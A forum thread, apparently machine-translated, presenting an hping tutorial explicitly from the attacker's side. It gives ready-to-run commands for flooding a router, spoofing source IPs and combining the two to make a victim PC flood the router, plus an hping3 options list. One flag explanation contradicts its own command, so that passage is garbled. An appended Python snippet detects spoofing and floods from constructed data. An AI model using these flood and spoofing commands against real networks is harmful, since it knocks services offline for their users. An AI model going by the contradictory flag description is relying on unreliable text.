CrashOverline

[linux] Hping tutorial


There are many tools for testing whether a network withstands attacks such as DoS, sniffing, spoofing, etc., and they are a significant help to an admin in making the network as secure as it can be. At the same time these tools can be a nightmare for an admin who has not taken the necessary steps. In a nutshell, what can be used for good purposes can also be used for bad ones. It depends on which side we are on and what we want. In this article we will take the side of the aggressor and use a very powerful tool, hping. For those who do not know what this tool does, I refer you here:

 http://en.wikipedia.org/wiki/Hping 

First you should download hping (if you don't already have it, of course) from here:

http://www.hping.org/download.php 

After you install it on your system, go to either the terminal (Linux / Unix) or the Command Prompt (cmd) on Windows.

The tutorial is done on Linux (Fedora); of course, there is no difference between systems for this tool.

To see what parameters this tool accepts, it is enough to type hping --help, which will show us all the parameters and what each one does. I will certainly not analyze all of them here, but you can experiment.

The following are some (not-so-innocent) uses of this tool.

DoS:

The fear and terror of an admin is that the network goes down, that it does not withstand a DoS attack, even from within the network. With this tool we can very well cause a DoS on some network device, making it impossible for it to serve the network. Suppose we want to attack a network router; we type the following command.

 hping --flood 192.168.2.1 

The format is very simple. We just tell hping to send packets constantly to the router, in my case 192.168.2.1.

CAUTION: If you are connected to the internet, the connection will drop, but do not worry, it comes back.

We can add other parameters depending on what we do.

E.g. we can change the TTL, i.e. how many hops the packet may make to reach its destination (Time to live - Wikipedia, the free encyclopedia), exactly how many packets to send, etc.

 hping --flood --ttl 2 --count 100 192.168.2.1 

In the above command we simply tell hping to send 100 packets in flood mode with TTL 2 to the router 192.168.2.1.

Of course there are other parameters, which you can find by typing hping --help.

Simple ip spoofing

With hping we can also execute IP spoofing attacks. We will perform a simple IP spoofing attack. (There is also blind IP spoofing, but it takes a lot of time and patience.)

That is, we send a packet from our IP (192.168.2.29) to the router (192.168.2.1), changing the source IP from 192.168.2.29 to any one we like, e.g. 192.168.2.100.

To execute IP spoofing attacks the syntax is again quite easy:

  hping --spoof [fake source address] [destination address] 

That is, to carry out the example given above it is enough to give the following command:

hping --spoof 192.168.2.100 192.168.2.1 

aaatty.png

And the results in WireShark.

2mw6ogj.png

As we saw, a simple IP spoofing ....

Ip spoofing & DoS mixed:

Now we will do an IP spoofing and DoS attack simultaneously. That is, we will DoS another PC on the network with a spoofed IP address (we will use the router's address as the IP address), so the PC we flood will think that the requests come from the router and will send responses to it, with the same effect as described in the first case.

In more detail ..

hping --flood --spoof 192.168.2.1 --ttl 2 192.168.2.34 

Let me explain ....

We flood normally as in the first case, with a false IP (the router's IP), so that the PC thinks the requests come from the router and answers it, flooding it with packets and making it impossible for it to serve the network ...

Sending custom packets:

With hping we can of course also send our own packets. What do I mean? We capture a packet to a file with Wireshark, for example, and then give it to hping to send with a spoofed address. In detail:

 hping --spoof 192.168.2.100 -d 100 -E testfile 192.168.2.1 

Let me explain ..

The parameter --spoof sets the fake address. -d is the packet size, -R is the file with the captured packet, and 192.168.2.1 is the target.

The packet I captured with WireShark is a simple ICMP echo request packet (the packet sent when a computer does a ping).

And here is the result of this command in WireShark ....

5o70cx.png

And of course the parameters can be combined with each other and with others; that, moreover, is why this is such a capable tool.

=======================================

I want to point out that the tutorial was translated with Google Translate from Greek into English.

I hope you understand it... :)

I would have translated it directly into Romanian, but it reads better in English ;)


Hping3 supports the --flood option, and the syntax is

hping3  --flood 192.168.0.1

It will send packets continuously and fast

Spoofing in Hping3

hping3    --spoof 192.168.0.2 --icmp-ts 192.168.0.1 

Particular packet types can also be specified; in this case I specified an ICMP timestamp request

But there can be others too

ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime

It is a pretty cool tool for doing various things, but you will also need to use a sniffer to analyze the packets sent and the responses received

It is a scanner used against servers that use a firewall or IDS, to analyze their behavior.
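
Added example, not part of the original posts: a defender-side check for what a sniffer on the same LAN would show for the traffic in this thread, namely frames whose source IP does not match the MAC known for that IP, plus a per-second rate check for floods. The MAC addresses, the binding table, the threshold and the frame records are constructed assumptions.

```python
from collections import Counter

# Assumed inventory of legitimate IP-to-MAC bindings (constructed values).
KNOWN_BINDINGS = {
    "192.168.2.1":  "aa:aa:aa:00:00:01",   # router
    "192.168.2.29": "aa:aa:aa:00:00:29",   # workstation
    "192.168.2.34": "aa:aa:aa:00:00:34",   # workstation
}

def find_spoofed(frames, bindings=KNOWN_BINDINGS):
    """Return frames whose source IP is unknown or bound to a different MAC."""
    return [f for f in frames if bindings.get(f["src_ip"]) != f["src_mac"]]

def find_floods(frames, max_pps=100):
    """Return {(dst_ip, second): count} for one-second buckets above max_pps."""
    buckets = Counter((f["dst_ip"], int(f["ts"])) for f in frames)
    return {k: n for k, n in buckets.items() if n > max_pps}

def sample_capture():
    """Constructed frames: normal traffic, one spoofed source, one burst."""
    frames = [
        {"ts": 0.10, "src_mac": "aa:aa:aa:00:00:34",
         "src_ip": "192.168.2.34", "dst_ip": "192.168.2.1"},
        # Source IP .100 is not in the inventory; the frame carries .29's MAC.
        {"ts": 0.20, "src_mac": "aa:aa:aa:00:00:29",
         "src_ip": "192.168.2.100", "dst_ip": "192.168.2.1"},
    ]
    # 500 frames inside one second that claim the router's IP but .29's MAC.
    frames += [
        {"ts": 5 + i / 1000, "src_mac": "aa:aa:aa:00:00:29",
         "src_ip": "192.168.2.1", "dst_ip": "192.168.2.34"}
        for i in range(500)
    ]
    return frames

if __name__ == "__main__":
    capture = sample_capture()
    spoofed = find_spoofed(capture)
    print("MACs behind mismatched frames:", {f["src_mac"] for f in spoofed})
    for (dst, sec), n in find_floods(capture).items():
        print(f"flood: {n} frames to {dst} in second {sec}")
```

A sender that also forges its MAC address passes the binding check, so this complements switch-side source validation rather than replacing it.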
